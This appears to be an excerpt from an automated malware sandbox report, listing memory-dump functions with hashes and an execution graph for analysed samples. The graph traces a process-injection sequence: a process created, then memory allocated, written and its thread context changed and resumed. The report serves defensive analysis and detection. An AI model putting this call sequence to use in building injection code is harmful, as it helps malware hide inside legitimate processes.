                                                              • Instruction ID: 906acec9509139218c8cdc8044a625e3b69c1505fbdd129e56693760a7234bc9
                                                              • Opcode Fuzzy Hash: 462d2469090bdfe2dbdb8d125283b000c4fd1b5335a33fc278c23edfb9c5f604
                                                              • Instruction Fuzzy Hash: FF212A34B10215CFDB18EB78D658AADB7F5AF8D240F100468E506EB3A4DB31ED80CB90
                                                              Function 01260AFB Relevance: .1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a721ca1448da3980e88c45949eb40e6910fcc109d7774d36f07419d941d65c93
                                                              • Instruction ID: 6b8f2a5b70ee468d99e80719fb63d874a56d9417754152df2351712eb325e189
                                                              • Opcode Fuzzy Hash: a721ca1448da3980e88c45949eb40e6910fcc109d7774d36f07419d941d65c93
                                                              • Instruction Fuzzy Hash: 141138317182058FC31A5B78849026E7FAAFFC5210F1484AFC106DB285EA398846C752
                                                              Function 01260838 Relevance: .1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 756f2f214a1b43c11b905ceb663c12186a6819e881137b4604040849544fb0e5
                                                              • Instruction ID: 7a775fed3989ccf91c966395c49086400b6f286c5c3e437ea5cae912cd8922c2
                                                              • Opcode Fuzzy Hash: 756f2f214a1b43c11b905ceb663c12186a6819e881137b4604040849544fb0e5
                                                              • Instruction Fuzzy Hash: 7011C630A213165BEF26967DD45036A325DF782214F148979F502CF2C2EA61CCD5ABC6
                                                              Function 01260848 Relevance: .1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5d8149d0285e62ec65aece78258d28c53881b8090f7acbcb149ccf9c65627f03
                                                              • Instruction ID: df194e1518463e33d7189e23aecb5b5c665b904643ba779f4c6e2c74ff0240f3
                                                              • Opcode Fuzzy Hash: 5d8149d0285e62ec65aece78258d28c53881b8090f7acbcb149ccf9c65627f03
                                                              • Instruction Fuzzy Hash: E611A330B2120A5BEF66EABDD4447693359FB86610F208979F116CF2C2EA61CCC59BC5
                                                              Function 01261488 Relevance: .1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4e2c2c0d462e625694ca2ecd8186ac2b5df5cf413142daa2996f89281b23425e
                                                              • Instruction ID: 8e51a9bb0822058989f34b19017398722feb4a818ba8ff3b548140c343bcbeee
                                                              • Opcode Fuzzy Hash: 4e2c2c0d462e625694ca2ecd8186ac2b5df5cf413142daa2996f89281b23425e
                                                              • Instruction Fuzzy Hash: 4C118271E202168FCB25AFBC84501AD76F9EB88210B1404B9D905E7381EB35D891CBD5
                                                              Function 01261498 Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fc5c1c0b5ff04460af29cd3e8f789fb0dba42d7532181480372013037d2de0d2
                                                              • Instruction ID: 7435242d48d30d7b4ae91c17bf7a2a7ac38f5b1265f3144759b67b207c8c8d8f
                                                              • Opcode Fuzzy Hash: fc5c1c0b5ff04460af29cd3e8f789fb0dba42d7532181480372013037d2de0d2
                                                              • Instruction Fuzzy Hash: 63014431A102169FCB15EFBC94501ADBBF9EF88210B140479D505E7381EB35D891CBD5
                                                              Function 0110D02B Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3943394583.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_110d000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                              • Instruction ID: 68f16fe1072c6682fe5b4b836abab6257c30466c002707ad3ad157bf3f76e9b4
                                                              • Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                              • Instruction Fuzzy Hash: 0911BE75904280DFCB16CF94D5C0B15FF61FB84314F24C6AAD8494B697C37AD44ACB62
                                                              Function 0126A6C5 Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e2464d7f187550de2f71020c7b15b004ac634c5125f3d3cbecc7b0f61ca000de
                                                              • Instruction ID: d89b74cc1125ea29ea052300af82e06194d51579333d242fa815eb63d416efb2
                                                              • Opcode Fuzzy Hash: e2464d7f187550de2f71020c7b15b004ac634c5125f3d3cbecc7b0f61ca000de
                                                              • Instruction Fuzzy Hash: 0E01B535A102058BDB04EFA8D9847DABB65FFD4310F54C174C90C6F296EB749945C791
                                                              Function 01266B98 Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b23f806faa56891dec99b199af8d876b8d9b682cab9623e84e014115ed335dbc
                                                              • Instruction ID: 9b53ae5a6154655e97aeb7b84de3196adc2aef7e617a79d545556e20723611e2
                                                              • Opcode Fuzzy Hash: b23f806faa56891dec99b199af8d876b8d9b682cab9623e84e014115ed335dbc
                                                              • Instruction Fuzzy Hash: 6A01F231B002119FD314AB78D4107AE7BA7EBCA311F10857EC10ACB780DE368C81C791
                                                              Function 01268F08 Relevance: .0, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3991ad8aff0be460ab804997daee5c2ea02cd1e8bfa8eb377d3dbcbb9abb88c9
                                                              • Instruction ID: 2a453b114dcccd85cf1c6492ebc8504352692ed3f023a06f1df211fa15d3dbc0
                                                              • Opcode Fuzzy Hash: 3991ad8aff0be460ab804997daee5c2ea02cd1e8bfa8eb377d3dbcbb9abb88c9
                                                              • Instruction Fuzzy Hash: 2B014B74901209EFDF51FBB9F991ADC7BB1FB84200F5047A9C009AB245EB322A15DB92
                                                              Function 01261524 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c427392874a33c226b4a22409900467b3c599261cce4f4a4d520f92a8e24a3a
                                                              • Instruction ID: 4db5ea8c506fc7de58fff915096a745adb452cb48ea80812631796c8c82e4eb7
                                                              • Opcode Fuzzy Hash: 5c427392874a33c226b4a22409900467b3c599261cce4f4a4d520f92a8e24a3a
                                                              • Instruction Fuzzy Hash: 18F02B73A24151CFD7128BF8A4911ACBFB8FAE421171D40E7D902DB2C1D725E4D6C755
                                                              Function 01267EA8 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a57adb5edbd93e04efce60ed79336712ce832054265bee2902b57a542053cf42
                                                              • Instruction ID: da795cc828d89141c67c0b2b1a34dc6f64310184eb941c125c9ea185cc233fdc
                                                              • Opcode Fuzzy Hash: a57adb5edbd93e04efce60ed79336712ce832054265bee2902b57a542053cf42
                                                              • Instruction Fuzzy Hash: DCF03735B40104CFCB04EB74E598BAC73B2EF89715F2186A8E5068B3A4CB32AD52CF40
                                                              Function 01268F18 Relevance: .0, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 93e3d848a7caa992e3f1a94e20d686cb84a11988a88e601c6d9c19b6fd0e4781
                                                              • Instruction ID: 0e3a3bd59cf7c6add943185404436ea7c11f668296580786056f65a3761f1724
                                                              • Opcode Fuzzy Hash: 93e3d848a7caa992e3f1a94e20d686cb84a11988a88e601c6d9c19b6fd0e4781
                                                              • Instruction Fuzzy Hash: 67F01434A0120DEBDF05FBB9F990ADD77B5FB84201F505BA9C105AB254EF322A149B82

                                                              Execution Graph

                                                              Execution Coverage:11.2%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:213
                                                              Total number of Limit Nodes:16
                                                              execution_graph 33962 d0b2c0 33963 d0b302 33962->33963 33964 d0b308 GetModuleHandleW 33962->33964 33963->33964 33965 d0b335 33964->33965 33998 d0d5a0 DuplicateHandle 33999 d0d636 33998->33999 33753 6ff757e 33754 6ff748c 33753->33754 33755 6ff749b 33754->33755 33759 6ff8936 33754->33759 33778 6ff88c0 33754->33778 33796 6ff88d0 33754->33796 33760 6ff88c4 33759->33760 33762 6ff8939 33759->33762 33814 6ff927f 33760->33814 33818 6ff91a0 33760->33818 33822 6ff9261 33760->33822 33826 6ff8e82 33760->33826 33834 6ff8f85 33760->33834 33841 6ff9685 33760->33841 33846 6ff8dc9 33760->33846 33854 6ff9009 33760->33854 33861 6ff92ce 33760->33861 33866 6ff8d8f 33760->33866 33870 6ff8d32 33760->33870 33876 6ff8db3 33760->33876 33880 6ff9075 33760->33880 33885 6ff92f6 33760->33885 33890 6ff8dfb 33760->33890 33761 6ff88f2 33761->33755 33762->33755 33779 6ff88ea 33778->33779 33781 6ff927f 2 API calls 33779->33781 33782 6ff8dfb 2 API calls 33779->33782 33783 6ff92f6 2 API calls 33779->33783 33784 6ff9075 2 API calls 33779->33784 33785 6ff8db3 2 API calls 33779->33785 33786 6ff8d32 4 API calls 33779->33786 33787 6ff8d8f 2 API calls 33779->33787 33788 6ff92ce 2 API calls 33779->33788 33789 6ff9009 4 API calls 33779->33789 33790 6ff8dc9 2 API calls 33779->33790 33791 6ff9685 2 API calls 33779->33791 33792 6ff8f85 4 API calls 33779->33792 33793 6ff8e82 2 API calls 33779->33793 33794 6ff9261 2 API calls 33779->33794 33795 6ff91a0 2 API calls 33779->33795 33780 6ff88f2 33780->33755 33781->33780 33782->33780 33783->33780 33784->33780 33785->33780 33786->33780 33787->33780 33788->33780 33789->33780 33790->33780 33791->33780 33792->33780 33793->33780 33794->33780 33795->33780 33797 6ff88ea 33796->33797 33799 6ff927f 2 API calls 33797->33799 33800 6ff8dfb 2 API calls 33797->33800 33801 6ff92f6 2 API calls 33797->33801 33802 6ff9075 2 API calls 33797->33802 33803 6ff8db3 2 API calls 33797->33803 33804 6ff8d32 4 API calls 33797->33804 33805 6ff8d8f 2 API calls 33797->33805 33806 6ff92ce 2 API calls 33797->33806 33807 6ff9009 4 API calls 33797->33807 33808 6ff8dc9 2 API calls 33797->33808 33809 6ff9685 2 API calls 33797->33809 33810 6ff8f85 4 API calls 33797->33810 33811 6ff8e82 2 API calls 33797->33811 33812 6ff9261 2 API calls 33797->33812 33813 6ff91a0 2 API calls 33797->33813 33798 6ff88f2 33798->33755 33799->33798 33800->33798 33801->33798 33802->33798 33803->33798 33804->33798 33805->33798 33806->33798 33807->33798 33808->33798 33809->33798 33810->33798 33811->33798 33812->33798 33813->33798 33815 6ff8d9b 33814->33815 33894 6ff6de8 33815->33894 33898 6ff6de0 33815->33898 33902 6ff6d28 33818->33902 33906 6ff6d20 33818->33906 33819 6ff91c2 33819->33761 33823 6ff91ef 33822->33823 33910 6ff6798 33823->33910 33914 6ff6791 33823->33914 33827 6ff8dd2 33826->33827 33827->33761 33828 6ff9666 33827->33828 33829 6ff8d9b 33827->33829 33832 6ff6de8 WriteProcessMemory 33827->33832 33833 6ff6de0 WriteProcessMemory 33827->33833 33828->33828 33830 6ff6de8 WriteProcessMemory 33829->33830 33831 6ff6de0 WriteProcessMemory 33829->33831 33830->33829 33831->33829 33832->33827 33833->33827 33918 6ff9a88 33834->33918 33923 6ff9a98 33834->33923 33835 6ff8fa2 33836 6ff9679 33835->33836 33837 6ff6798 ResumeThread 33835->33837 33838 6ff6791 ResumeThread 33835->33838 33837->33835 33838->33835 33936 6ff6ed8 33841->33936 33940 6ff6ed0 33841->33940 33842 6ff913e 33842->33841 33843 6ff96f4 33842->33843 33843->33761 33848 6ff8dd2 33846->33848 33847 6ff9666 33848->33761 33848->33847 33849 6ff8d9b 33848->33849 33850 6ff6de8 WriteProcessMemory 33848->33850 33851 6ff6de0 WriteProcessMemory 33848->33851 33852 6ff6de8 WriteProcessMemory 33849->33852 33853 6ff6de0 WriteProcessMemory 33849->33853 33850->33848 33851->33848 33852->33849 33853->33849 33859 6ff6c49 Wow64SetThreadContext 33854->33859 33860 6ff6c50 Wow64SetThreadContext 33854->33860 33855 6ff906f 33856 6ff8d9b 33856->33855 33857 6ff6de8 WriteProcessMemory 33856->33857 33858 6ff6de0 WriteProcessMemory 33856->33858 33857->33856 33858->33856 33859->33856 33860->33856 33862 6ff908c 33861->33862 33863 6ff8f16 33862->33863 33864 6ff6de8 WriteProcessMemory 33862->33864 33865 6ff6de0 WriteProcessMemory 33862->33865 33863->33761 33864->33863 33865->33863 33867 6ff8d9b 33866->33867 33868 6ff6de8 WriteProcessMemory 33867->33868 33869 6ff6de0 WriteProcessMemory 33867->33869 33868->33867 33869->33867 33944 6ff706f 33870->33944 33948 6ff7070 33870->33948 33877 6ff8dc0 33876->33877 33878 6ff6798 ResumeThread 33877->33878 33879 6ff6791 ResumeThread 33877->33879 33878->33877 33879->33877 33881 6ff907b 33880->33881 33883 6ff6de8 WriteProcessMemory 33881->33883 33884 6ff6de0 WriteProcessMemory 33881->33884 33882 6ff8f16 33882->33761 33883->33882 33884->33882 33886 6ff92fa 33885->33886 33887 6ff8d9b 33885->33887 33886->33761 33888 6ff6de8 WriteProcessMemory 33887->33888 33889 6ff6de0 WriteProcessMemory 33887->33889 33888->33887 33889->33887 33891 6ff8d9b 33890->33891 33891->33890 33892 6ff6de8 WriteProcessMemory 33891->33892 33893 6ff6de0 WriteProcessMemory 33891->33893 33892->33891 33893->33891 33895 6ff6e30 WriteProcessMemory 33894->33895 33897 6ff6e87 33895->33897 33897->33815 33899 6ff6de8 WriteProcessMemory 33898->33899 33901 6ff6e87 33899->33901 33901->33815 33903 6ff6d68 VirtualAllocEx 33902->33903 33905 6ff6da5 33903->33905 33905->33819 33907 6ff6d28 VirtualAllocEx 33906->33907 33909 6ff6da5 33907->33909 33909->33819 33911 6ff67d8 ResumeThread 33910->33911 33913 6ff6809 33911->33913 33913->33823 33915 6ff6798 ResumeThread 33914->33915 33917 6ff6809 33915->33917 33917->33823 33919 6ff9aad 33918->33919 33928 6ff6c49 33919->33928 33932 6ff6c50 33919->33932 33920 6ff9ac3 33920->33835 33924 6ff9aad 33923->33924 33926 6ff6c49 Wow64SetThreadContext 33924->33926 33927 6ff6c50 Wow64SetThreadContext 33924->33927 33925 6ff9ac3 33925->33835 33926->33925 33927->33925 33929 6ff6c50 Wow64SetThreadContext 33928->33929 33931 6ff6cdd 33929->33931 33931->33920 33933 6ff6c95 Wow64SetThreadContext 33932->33933 33935 6ff6cdd 33933->33935 33935->33920 33937 6ff6f23 ReadProcessMemory 33936->33937 33939 6ff6f67 33937->33939 33939->33842 33941 6ff6ed8 ReadProcessMemory 33940->33941 33943 6ff6f67 33941->33943 33943->33842 33945 6ff7070 CreateProcessA 33944->33945 33947 6ff72bb 33945->33947 33947->33947 33949 6ff70f9 CreateProcessA 33948->33949 33951 6ff72bb 33949->33951 33951->33951 34000 6ff9b08 34001 6ff9b2e 34000->34001 34002 6ff9c93 34000->34002 34001->34002 34004 6ff693c 34001->34004 34005 6ff9d88 PostMessageW 34004->34005 34006 6ff9df4 34005->34006 34006->34001 33952 d0d358 33953 d0d39e GetCurrentProcess 33952->33953 33955 d0d3f0 GetCurrentThread 33953->33955 33956 d0d3e9 33953->33956 33957 d0d426 33955->33957 33958 d0d42d GetCurrentProcess 33955->33958 33956->33955 33957->33958 33959 d0d463 33958->33959 33960 d0d48b GetCurrentThreadId 33959->33960 33961 d0d4bc 33960->33961 34007 d04668 34008 d04672 34007->34008 34010 d04758 34007->34010 34011 d0477d 34010->34011 34015 d04858 34011->34015 34019 d04868 34011->34019 34017 d04868 34015->34017 34016 d0496c 34016->34016 34017->34016 34023 d044b4 34017->34023 34021 d0488f 34019->34021 34020 d0496c 34020->34020 34021->34020 34022 d044b4 CreateActCtxA 34021->34022 34022->34020 34024 d058f8 CreateActCtxA 34023->34024 34026 d059bb 34024->34026 33966 5951048 33968 5951082 33966->33968 33967 5951113 33968->33967 33972 5951130 33968->33972 33977 5951140 33968->33977 33969 5951109 33973 595116e 33972->33973 33974 59515a2 33972->33974 33973->33974 33982 59527c0 33973->33982 33988 59527af 33973->33988 33974->33969 33978 595116e 33977->33978 33979 59515a2 33977->33979 33978->33979 33980 59527c0 2 API calls 33978->33980 33981 59527af 2 API calls 33978->33981 33979->33969 33980->33979 33981->33979 33995 595211c 33982->33995 33985 59527e7 33985->33974 33986 5952810 CreateIconFromResourceEx 33987 595288e 33986->33987 33987->33974 33989 59527c0 33988->33989 33990 595211c CreateIconFromResourceEx 33989->33990 33991 59527da 33990->33991 33992 59527e7 33991->33992 33993 5952810 CreateIconFromResourceEx 33991->33993 33992->33974 33994 595288e 33993->33994 33994->33974 33996 5952810 CreateIconFromResourceEx 33995->33996 33997 59527da 33996->33997 33997->33985 33997->33986

                                                              Executed Functions

                                                              Function 00D0D357 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 00D0D3D6
                                                              • GetCurrentThread.KERNEL32 ref: 00D0D413
                                                              • GetCurrentProcess.KERNEL32 ref: 00D0D450
                                                              • GetCurrentThreadId.KERNEL32 ref: 00D0D4A9
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1573193825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_d00000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 0fca777d88f45f0bbb6894c78a6995ba0bc2c12d7aa7dfed68b56bf5d34a967b
                                                              • Instruction ID: cbe6d9fca0647d2977a8b479ef43ade1058a1f9f6152d7a7e5ca507ff3fd0565
                                                              • Opcode Fuzzy Hash: 0fca777d88f45f0bbb6894c78a6995ba0bc2c12d7aa7dfed68b56bf5d34a967b
                                                              • Instruction Fuzzy Hash: B95137B0900749CFEB14DFAAD548B9EBBF2EB48304F24805AE419A7391D774A944CB66
                                                              Function 00D0D358 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 00D0D3D6
                                                              • GetCurrentThread.KERNEL32 ref: 00D0D413
                                                              • GetCurrentProcess.KERNEL32 ref: 00D0D450
                                                              • GetCurrentThreadId.KERNEL32 ref: 00D0D4A9
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1573193825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_d00000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 68e5303d4dc9a066b53b67c888b512df37f9ae5b9d9111f222ac9ed86c4dd64f
                                                              • Instruction ID: 5494a3e78f92fd6152f94c65239ac6c10d8ebe8fc73428b76e0638d20ef24f89
                                                              • Opcode Fuzzy Hash: 68e5303d4dc9a066b53b67c888b512df37f9ae5b9d9111f222ac9ed86c4dd64f
                                                              • Instruction Fuzzy Hash: AC5137B0900749CFEB14DFAAD548B9EBBF2EB48304F24805AE419A7391D774A944CB66
                                                              Function 06FF706F Relevance: 1.7, APIs: 1, Instructions: 244processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 44 6ff706f-6ff7105 47 6ff713e-6ff715e 44->47 48 6ff7107-6ff7111 44->48 55 6ff7197-6ff71c6 47->55 56 6ff7160-6ff716a 47->56 48->47 49 6ff7113-6ff7115 48->49 50 6ff7138-6ff713b 49->50 51 6ff7117-6ff7121 49->51 50->47 53 6ff7125-6ff7134 51->53 54 6ff7123 51->54 53->53 57 6ff7136 53->57 54->53 62 6ff71ff-6ff72b9 CreateProcessA 55->62 63 6ff71c8-6ff71d2 55->63 56->55 58 6ff716c-6ff716e 56->58 57->50 60 6ff7191-6ff7194 58->60 61 6ff7170-6ff717a 58->61 60->55 64 6ff717e-6ff718d 61->64 65 6ff717c 61->65 76 6ff72bb-6ff72c1 62->76 77 6ff72c2-6ff7348 62->77 63->62 67 6ff71d4-6ff71d6 63->67 64->64 66 6ff718f 64->66 65->64 66->60 68 6ff71f9-6ff71fc 67->68 69 6ff71d8-6ff71e2 67->69 68->62 71 6ff71e6-6ff71f5 69->71 72 6ff71e4 69->72 71->71 74 6ff71f7 71->74 72->71 74->68 76->77 87 6ff734a-6ff734e 77->87 88 6ff7358-6ff735c 77->88 87->88 89 6ff7350 87->89 90 6ff735e-6ff7362 88->90 91 6ff736c-6ff7370 88->91 89->88 90->91 94 6ff7364 90->94 92 6ff7372-6ff7376 91->92 93 6ff7380-6ff7384 91->93 92->93 95 6ff7378 92->95 96 6ff7396-6ff739d 93->96 97 6ff7386-6ff738c 93->97 94->91 95->93 98 6ff739f-6ff73ae 96->98 99 6ff73b4 96->99 97->96 98->99 101 6ff73b5 99->101 101->101
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06FF72A6
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 51e0e4603ff432de09d6354001af2ac7b77f6b1cadaa9f95ba0a37a6915df363
                                                              • Instruction ID: 8ff485a445236add905e2957c8e3f20408d17c50c14f27f45aadeec84585874e
                                                              • Opcode Fuzzy Hash: 51e0e4603ff432de09d6354001af2ac7b77f6b1cadaa9f95ba0a37a6915df363
                                                              • Instruction Fuzzy Hash: 59917871D10319DFEB60DFA8D841BDEFBB2AF48310F0485A9E948A7290DB749985CF91
                                                              Function 06FF7070 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 102 6ff7070-6ff7105 104 6ff713e-6ff715e 102->104 105 6ff7107-6ff7111 102->105 112 6ff7197-6ff71c6 104->112 113 6ff7160-6ff716a 104->113 105->104 106 6ff7113-6ff7115 105->106 107 6ff7138-6ff713b 106->107 108 6ff7117-6ff7121 106->108 107->104 110 6ff7125-6ff7134 108->110 111 6ff7123 108->111 110->110 114 6ff7136 110->114 111->110 119 6ff71ff-6ff72b9 CreateProcessA 112->119 120 6ff71c8-6ff71d2 112->120 113->112 115 6ff716c-6ff716e 113->115 114->107 117 6ff7191-6ff7194 115->117 118 6ff7170-6ff717a 115->118 117->112 121 6ff717e-6ff718d 118->121 122 6ff717c 118->122 133 6ff72bb-6ff72c1 119->133 134 6ff72c2-6ff7348 119->134 120->119 124 6ff71d4-6ff71d6 120->124 121->121 123 6ff718f 121->123 122->121 123->117 125 6ff71f9-6ff71fc 124->125 126 6ff71d8-6ff71e2 124->126 125->119 128 6ff71e6-6ff71f5 126->128 129 6ff71e4 126->129 128->128 131 6ff71f7 128->131 129->128 131->125 133->134 144 6ff734a-6ff734e 134->144 145 6ff7358-6ff735c 134->145 144->145 146 6ff7350 144->146 147 6ff735e-6ff7362 145->147 148 6ff736c-6ff7370 145->148 146->145 147->148 151 6ff7364 147->151 149 6ff7372-6ff7376 148->149 150 6ff7380-6ff7384 148->150 149->150 152 6ff7378 149->152 153 6ff7396-6ff739d 150->153 154 6ff7386-6ff738c 150->154 151->148 152->150 155 6ff739f-6ff73ae 153->155 156 6ff73b4 153->156 154->153 155->156 158 6ff73b5 156->158 158->158
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06FF72A6
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 2f96432d39f1af571f7aa2f85be3d1a7d6e9c148ac0042df7da6b333aa1a7ea4
                                                              • Instruction ID: 3e4315c37eab970978b2e2b57f5482280fef84f761c7f1db2a4a8be310cc8a4f
                                                              • Opcode Fuzzy Hash: 2f96432d39f1af571f7aa2f85be3d1a7d6e9c148ac0042df7da6b333aa1a7ea4
                                                              • Instruction Fuzzy Hash: 26917871D10319DFEB60DFA8D841BDEFBB2AF48310F0485A9E948A7290DB749985CF91
                                                              Function 00D05A64 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 159 d05a64-d05af4
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1573193825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_d00000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d8707a84cbd063e4b630b173213ec370ecd5459e2d745827a134b811170d7554
                                                              • Instruction ID: e114340c3328bf3eebe623b6f44919e12da94f85d93db30e29e867f6336a05d3
                                                              • Opcode Fuzzy Hash: d8707a84cbd063e4b630b173213ec370ecd5459e2d745827a134b811170d7554
                                                              • Instruction Fuzzy Hash: 2B410471905B48CFEB11CFA8E8447EFBBB1AF56314F14418AC489AF299C7356906CF21
